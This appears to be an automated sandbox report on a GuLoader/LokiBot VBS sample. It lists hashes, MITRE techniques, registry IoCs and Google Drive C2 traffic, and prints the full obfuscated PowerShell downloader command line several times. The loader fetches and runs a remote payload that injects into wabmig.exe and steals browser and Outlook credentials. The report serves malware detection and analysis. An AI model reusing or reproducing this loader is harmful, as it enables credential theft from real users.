guloader | 8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447

General

Target

8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447.vbs
Size

33KB
MD5

0d5aa3c54f12fb3d254dc0ed6f946d2e
SHA1

04d6915391bc112a8dcc482616473d21e67209ac
SHA256

8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447
SHA512

0e416cd7f37c8266269894ac768fc57172e55685555ed2db10ed74cba0f4d64b45d3582acd1a0717f47becd23450f5aec4038434366ccdb1a2cad2524c42e9d0
SSDEEP

384:Z9vOg3hVg1cC9a4pYTagc3NE7p5sUm5zSouEDfvl/7GRh/DvvxsWoutDwTK:Zp3hzC9aqYTEZUKXDfN/7GR1zxsODb

Score

10^/10

guloader lokibot collection credential_access discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	2936	powershell.exe
19	2936	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2936	powershell.exe
2584	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
28	drive.google.com
12	drive.google.com
13	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4664	wabmig.exe
4664	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2584	powershell.exe
4664	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2584 set thread context of 4664	2584	powershell.exe	95

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2936	powershell.exe
2936	powershell.exe
2584	powershell.exe
2584	powershell.exe
2584	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2584	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	4664	wabmig.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3696 wrote to memory of 2936	3696	WScript.exe	82
PID 3696 wrote to memory of 2936	3696	WScript.exe	82
PID 2936 wrote to memory of 1816	2936	powershell.exe	84
PID 2936 wrote to memory of 1816	2936	powershell.exe	84
PID 2936 wrote to memory of 2072	2936	powershell.exe	90
PID 2936 wrote to memory of 2072	2936	powershell.exe	90
PID 2072 wrote to memory of 2584	2072	cmd.exe	91
PID 2072 wrote to memory of 2584	2072	cmd.exe	91
PID 2072 wrote to memory of 2584	2072	cmd.exe	91
PID 2584 wrote to memory of 3060	2584	powershell.exe	94
PID 2584 wrote to memory of 3060	2584	powershell.exe	94
PID 2584 wrote to memory of 3060	2584	powershell.exe	94
PID 2584 wrote to memory of 4664	2584	powershell.exe	95
PID 2584 wrote to memory of 4664	2584	powershell.exe	95
PID 2584 wrote to memory of 4664	2584	powershell.exe	95
PID 2584 wrote to memory of 4664	2584	powershell.exe	95
PID 2584 wrote to memory of 4664	2584	powershell.exe	95

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b496e6f6fa5824fc7a95dc9844fdcbbb3d8abb215476ffc2e2abe0142be0447.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"
    3⤵
    PID:1816
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree 